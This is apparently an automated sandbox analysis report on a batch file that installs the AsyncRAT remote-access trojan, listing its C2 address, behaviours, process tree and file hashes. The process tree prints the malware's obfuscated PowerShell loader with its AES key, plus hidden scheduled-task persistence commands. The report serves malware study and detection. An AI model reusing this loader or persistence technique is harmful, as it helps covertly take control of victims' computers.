Overview

overview

10

Static

static

1

skibidi toilet.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    20-11-2024 17:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    skibidi toilet.bat

  • Size

    395KB

  • MD5

    fbcad94ee92cc636d8bba4f642130122

  • SHA1

    e6efade17853c9d8cd4948c066d305ae7eb63f92

  • SHA256

    14ff4d8940a0742974ca662986e8c421e2b0ee7c4dd3bad42133a06d83ff01e7

  • SHA512

    a8aecd98d6ec6ccd40c76878d2f5669cb0260c9717af332adb053c7709a17669dc1d8906dae48081fc8e0f3712b462af013187975951b4b9a618ca1e08319de4

  • SSDEEP

    6144:ZVjmIVN5c/teuyotWSdLVnUUSONjj3CRTPWYMGHGB/CERDTnL98UVzeBy/Dvi:TjVN5c/19koVUwjZYM5B/CER7VCui

Score
10/10
asyncratvictimdefense_evasionexecutionrat

Malware Config

Extracted

Family

asyncrat

Botnet

Victim

C2

193.161.193.99:36700

Attributes
  • delay

    1

  • install

    true

  • install_file

    sysvlrhp.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
      PID:808
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:932
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:992
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:780
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:760
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1068
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1148
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                    1⤵
                      PID:1172
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1196
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1240
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1344
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1428
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Indicator Removal: Clear Windows Event Logs
                            PID:1472
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1544
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1556
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1584
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                  1⤵
                                    PID:1672
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1740
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1812
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1844
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:2016
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1180
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1236
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                1⤵
                                                  PID:2064
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:2072
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                    1⤵
                                                      PID:2204
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2272
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2388
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                          1⤵
                                                            PID:2484
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2492
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                                PID:2512
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                1⤵
                                                                  PID:2592
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                    PID:2628
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2664
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2680
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:3044
                                                                        • C:\Windows\Explorer.EXE
                                                                          C:\Windows\Explorer.EXE
                                                                          1⤵
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:3292
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skibidi toilet.bat"
                                                                            2⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2944
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izPfV11HfqMvi1lIFXzMNUJXr5RyKqW+SGrEDG8GF3A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dS+E0kIPSP6vVymeMj9P5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ldSZb=New-Object System.IO.MemoryStream(,$param_var); $oriEw=New-Object System.IO.MemoryStream; $QUSyd=New-Object System.IO.Compression.GZipStream($ldSZb, [IO.Compression.CompressionMode]::Decompress); $QUSyd.CopyTo($oriEw); $QUSyd.Dispose(); $ldSZb.Dispose(); $oriEw.Dispose(); $oriEw.ToArray();}function execute_function($param_var,$param2_var){ $QWeoB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DDVCK=$QWeoB.EntryPoint; $DDVCK.Invoke($null, $param2_var);}$FyUxZ = 'C:\Users\Admin\AppData\Local\Temp\skibidi toilet.bat';$host.UI.RawUI.WindowTitle = $FyUxZ;$JhzTL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FyUxZ).Split([Environment]::NewLine);foreach ($kGcTn in $JhzTL) { if ($kGcTn.StartsWith('ZXAGlRuoMrnYZUvTYuCb')) { $GmyZF=$kGcTn.Substring(20); break; }}$payloads_var=[string[]]$GmyZF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                              3⤵
                                                                                PID:4844
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                3⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4640
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_222_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_222.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3436
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_222.vbs"
                                                                                  4⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4668
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_222.bat" "
                                                                                    5⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3640
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izPfV11HfqMvi1lIFXzMNUJXr5RyKqW+SGrEDG8GF3A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dS+E0kIPSP6vVymeMj9P5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ldSZb=New-Object System.IO.MemoryStream(,$param_var); $oriEw=New-Object System.IO.MemoryStream; $QUSyd=New-Object System.IO.Compression.GZipStream($ldSZb, [IO.Compression.CompressionMode]::Decompress); $QUSyd.CopyTo($oriEw); $QUSyd.Dispose(); $ldSZb.Dispose(); $oriEw.Dispose(); $oriEw.ToArray();}function execute_function($param_var,$param2_var){ $QWeoB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DDVCK=$QWeoB.EntryPoint; $DDVCK.Invoke($null, $param2_var);}$FyUxZ = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_222.bat';$host.UI.RawUI.WindowTitle = $FyUxZ;$JhzTL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FyUxZ).Split([Environment]::NewLine);foreach ($kGcTn in $JhzTL) { if ($kGcTn.StartsWith('ZXAGlRuoMrnYZUvTYuCb')) { $GmyZF=$kGcTn.Substring(20); break; }}$payloads_var=[string[]]$GmyZF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      6⤵
                                                                                        PID:2580
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                        6⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2056
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "sysvlrhp" /tr '"C:\Users\Admin\AppData\Roaming\sysvlrhp.exe"' & exit
                                                                                          7⤵
                                                                                            PID:3116
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "sysvlrhp" /tr '"C:\Users\Admin\AppData\Roaming\sysvlrhp.exe"'
                                                                                              8⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2736
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp884A.tmp.bat""
                                                                                            7⤵
                                                                                              PID:1604
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout 3
                                                                                                8⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:1592
                                                                                              • C:\Users\Admin\AppData\Roaming\sysvlrhp.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\sysvlrhp.exe"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:2380
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3460
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                    1⤵
                                                                                      PID:3480
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                      1⤵
                                                                                        PID:3964
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                        1⤵
                                                                                          PID:4412
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                          1⤵
                                                                                            PID:4632
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                            1⤵
                                                                                              PID:3392
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4584
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:432
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:2180
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                  1⤵
                                                                                                    PID:3320

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    df472dcddb36aa24247f8c8d8a517bd7

                                                                                                    SHA1

                                                                                                    6f54967355e507294cbc86662a6fbeedac9d7030

                                                                                                    SHA256

                                                                                                    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                                                                    SHA512

                                                                                                    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    d4b41d203f165dfa37f94508955b910b

                                                                                                    SHA1

                                                                                                    2420d169c99ba6fa6f335e96b219bf68efd125de

                                                                                                    SHA256

                                                                                                    7e6a7f42f40a4d93b31f1ecb971b4287c030101881e9392174562074073b0686

                                                                                                    SHA512

                                                                                                    98e2b0ebc8acfcea2dc603f5e6e6d1c73522e7344412a3674b009102e124c6fa90e706648fe70215ee697cb13ec63043c4430c050e3a3d5ea802a6ce65ccb7f5

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    3ec0d76d886b2f4b9f1e3da7ce9e2cd7

                                                                                                    SHA1

                                                                                                    68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

                                                                                                    SHA256

                                                                                                    214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

                                                                                                    SHA512

                                                                                                    a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4z5j0bix.qhl.ps1
                                                                                                    Filesize

                                                                                                    60B

                                                                                                    MD5

                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                    SHA1

                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                    SHA256

                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                    SHA512

                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmp884A.tmp.bat
                                                                                                    Filesize

                                                                                                    152B

                                                                                                    MD5

                                                                                                    a1cbe312842e46745f88369c6f646e15

                                                                                                    SHA1

                                                                                                    c7e308d2a1df1af0410045ddc879f80aae7cfac2

                                                                                                    SHA256

                                                                                                    94cca25d8f33f93fc6e337ad7a48cc8121d2475bc0f82ae472d7ac5e3866e1d1

                                                                                                    SHA512

                                                                                                    0d42fb788c7909430a2d2e2a145fe8409bf5f4c1417d2d0678d868b033eda40794039249027c8a5dcbbe50a1428ea1ed367b5b6cf18958b45b626a16e3114bcb

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_222.bat
                                                                                                    Filesize

                                                                                                    395KB

                                                                                                    MD5

                                                                                                    fbcad94ee92cc636d8bba4f642130122

                                                                                                    SHA1

                                                                                                    e6efade17853c9d8cd4948c066d305ae7eb63f92

                                                                                                    SHA256

                                                                                                    14ff4d8940a0742974ca662986e8c421e2b0ee7c4dd3bad42133a06d83ff01e7

                                                                                                    SHA512

                                                                                                    a8aecd98d6ec6ccd40c76878d2f5669cb0260c9717af332adb053c7709a17669dc1d8906dae48081fc8e0f3712b462af013187975951b4b9a618ca1e08319de4

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_222.vbs
                                                                                                    Filesize

                                                                                                    124B

                                                                                                    MD5

                                                                                                    c08424cf4c17c7ad77852468caa2a757

                                                                                                    SHA1

                                                                                                    bfc456fc06bc649b406c200a7a4236f6091ba6e0

                                                                                                    SHA256

                                                                                                    fd4bb14ab9b60de3a76a1decef67ff052b08ac11966c754c077ccffffb31a600

                                                                                                    SHA512

                                                                                                    514d19a59f966334c0af7f7de3e2122c14ac92637d07a6bebb10e053417982f0074890c3fea475804703df8e9e0eb4af2456c77a7c8027d65de739d54a352cf0

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Roaming\sysvlrhp.exe
                                                                                                    Filesize

                                                                                                    440KB

                                                                                                    MD5

                                                                                                    0e9ccd796e251916133392539572a374

                                                                                                    SHA1

                                                                                                    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                                                                                    SHA256

                                                                                                    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                                                                                    SHA512

                                                                                                    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                                                                                    Download Submit

                                                                                                  • memory/760-64-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/780-74-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/932-72-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1068-105-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1084-103-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1148-63-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1172-55-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1180-53-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1344-71-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1472-104-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1544-65-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1556-54-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1672-92-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1740-66-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2056-51-0x000001BCC9F20000-0x000001BCC9F36000-memory.dmp

                                                                                                    Filesize

                                                                                                    88KB

                                                                                                    Download

                                                                                                  • memory/2064-93-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2072-95-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2272-98-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2388-73-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2484-79-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2492-80-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2512-78-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2664-96-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2680-100-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3044-106-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3292-47-0x0000000003B90000-0x0000000003BBA000-memory.dmp

                                                                                                    Filesize

                                                                                                    168KB

                                                                                                    Download

                                                                                                  • memory/3292-52-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3320-62-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3436-27-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/3436-26-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/3436-25-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/3436-30-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/3460-94-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3480-91-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/4632-99-0x00007FFD7F130000-0x00007FFD7F140000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/4640-15-0x000002502ECB0000-0x000002502ECFC000-memory.dmp

                                                                                                    Filesize

                                                                                                    304KB

                                                                                                    Download

                                                                                                  • memory/4640-14-0x000002502EC30000-0x000002502EC38000-memory.dmp

                                                                                                    Filesize

                                                                                                    32KB

                                                                                                    Download

